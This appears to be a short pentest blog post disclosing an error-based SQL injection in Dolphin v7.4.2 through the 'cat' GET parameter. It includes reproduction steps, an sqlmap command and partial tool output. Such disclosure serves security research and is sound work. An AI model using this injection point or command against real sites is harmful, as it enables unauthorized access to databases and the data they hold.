Friday, 19 July 2024

Friday Fun Pentest Series - 8 - dolphinv7.4.2


Description

- It was found that the application suffers from error based SQL injection


SQL Injection

Steps to Reproduce:

  1. Navigate to "Builders" menu
  2. The HTTP GET parameter of "?cat=builders" is displayed in the URL bar
  3. That is the injection point
  4. Automate process with SQLMap


sqlmap -r request.txt --dbms=mysql -p cat

[...]
[INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45, Apache
back-end DBMS: MySQL >= 5.0.12
[...]
at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Friday Fun Pentest Series - 15 - OOB XXE - fronsetiav1.1

Description - The application is vulnerable to OOB XXE injection XXE  #1 - " show_operations.jsp " Steps to Reproduce: Add Python3...